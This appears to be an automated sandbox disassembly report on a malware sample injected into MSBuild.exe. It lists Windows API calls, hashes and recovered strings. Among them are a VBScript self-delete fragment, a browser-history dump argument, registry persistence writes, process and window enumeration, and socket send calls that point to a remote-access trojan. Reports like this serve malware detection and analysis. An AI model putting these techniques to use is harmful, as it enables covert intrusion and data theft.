                                                                                                • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                APIs
                                                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: pth_unenc$BG
                                                                                                • API String ID: 1818849710-2233081382
                                                                                                • Opcode ID: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                • Opcode Fuzzy Hash: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,0040483F,00000001,?,00000000,?,0040466D,00000000,?), ref: 00404AED
                                                                                                • SetEvent.KERNEL32(?,?,00000000,?,0040466D,00000000,?), ref: 00404AF9
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?,0040466D,00000000,?), ref: 00404B04
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,0040466D,00000000,?), ref: 00404B0D
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                • String ID: KeepAlive | Disabled
                                                                                                • API String ID: 2993684571-305739064
                                                                                                • Opcode ID: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                • Opcode Fuzzy Hash: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                                APIs
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                                • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                • String ID: Alarm triggered
                                                                                                • API String ID: 614609389-2816303416
                                                                                                • Opcode ID: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                                • Opcode Fuzzy Hash: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                                Strings
                                                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                • API String ID: 3024135584-2418719853
                                                                                                • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                                • Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                                APIs
                                                                                                  • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                • String ID:
                                                                                                • API String ID: 3525466593-0
                                                                                                • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                                APIs
                                                                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 4269425633-0
                                                                                                • Opcode ID: a53ec5183e024bbcb9521430751280d669ff21e0ce9ca2bf7fd7e75f6157cf8e
                                                                                                • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                                • Opcode Fuzzy Hash: a53ec5183e024bbcb9521430751280d669ff21e0ce9ca2bf7fd7e75f6157cf8e
                                                                                                • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                                • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                                                • __freea.LIBCMT ref: 0044FFC4
                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                • String ID:
                                                                                                • API String ID: 313313983-0
                                                                                                • Opcode ID: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                                                                                                • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                • Opcode Fuzzy Hash: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                                                                                                • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                • _free.LIBCMT ref: 0044E1A0
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                • String ID:
                                                                                                • API String ID: 336800556-0
                                                                                                • Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                • Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
                                                                                                • _free.LIBCMT ref: 00446F7D
                                                                                                • _free.LIBCMT ref: 00446FA4
                                                                                                • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
                                                                                                • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free
                                                                                                • String ID:
                                                                                                • API String ID: 3170660625-0
                                                                                                • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                                • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 0044F7B5
                                                                                                  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                • _free.LIBCMT ref: 0044F7C7
                                                                                                • _free.LIBCMT ref: 0044F7D9
                                                                                                • _free.LIBCMT ref: 0044F7EB
                                                                                                • _free.LIBCMT ref: 0044F7FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00443305
                                                                                                  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                • _free.LIBCMT ref: 00443317
                                                                                                • _free.LIBCMT ref: 0044332A
                                                                                                • _free.LIBCMT ref: 0044333B
                                                                                                • _free.LIBCMT ref: 0044334C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                                APIs
                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                • String ID: (FG
                                                                                                • API String ID: 3142014140-2273637114
                                                                                                • Opcode ID: 445514f8f10a0b8609e824b62e8f8a93a687c6967793b9b12c59755632f7be03
                                                                                                • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                • Opcode Fuzzy Hash: 445514f8f10a0b8609e824b62e8f8a93a687c6967793b9b12c59755632f7be03
                                                                                                • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                APIs
                                                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                  • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                • String ID: XCG$`AG$>G
                                                                                                • API String ID: 2334542088-2372832151
                                                                                                • Opcode ID: e239f70684f8ed08a2f75d87af0facd3263048ec0520102d7ec34cb9f50fb045
                                                                                                • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                • Opcode Fuzzy Hash: e239f70684f8ed08a2f75d87af0facd3263048ec0520102d7ec34cb9f50fb045
                                                                                                • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 00442714
                                                                                                • _free.LIBCMT ref: 004427DF
                                                                                                • _free.LIBCMT ref: 004427E9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$FileModuleName
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                • API String ID: 2506810119-4083458154
                                                                                                • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                • API String ID: 368326130-2663660666
                                                                                                • Opcode ID: 343bbff2b1f6d2a81ded7ae9fccc3908f2447b4f07859ff5f1d91aa182ddba68
                                                                                                • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                                • Opcode Fuzzy Hash: 343bbff2b1f6d2a81ded7ae9fccc3908f2447b4f07859ff5f1d91aa182ddba68
                                                                                                • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                                APIs
                                                                                                  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                • ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
                                                                                                • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateExecuteExitFileProcessShell
                                                                                                • String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                                • API String ID: 2309964880-3562070623
                                                                                                • Opcode ID: 390205f58295ca3481fe5ab8602b7fa4db45e117a05dec8e4925fefabcc5de7f
                                                                                                • Instruction ID: 568fed376c07edf90cd2df9b8610832c68d616ac56d6d0e00b2c9eff25916ff3
                                                                                                • Opcode Fuzzy Hash: 390205f58295ca3481fe5ab8602b7fa4db45e117a05dec8e4925fefabcc5de7f
                                                                                                • Instruction Fuzzy Hash: 692145315042405AC324FB25E8969BF77E4AFD1319F50493FF482620F2EF38AA49C69A
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                • wsprintfW.USER32 ref: 0040A905
                                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
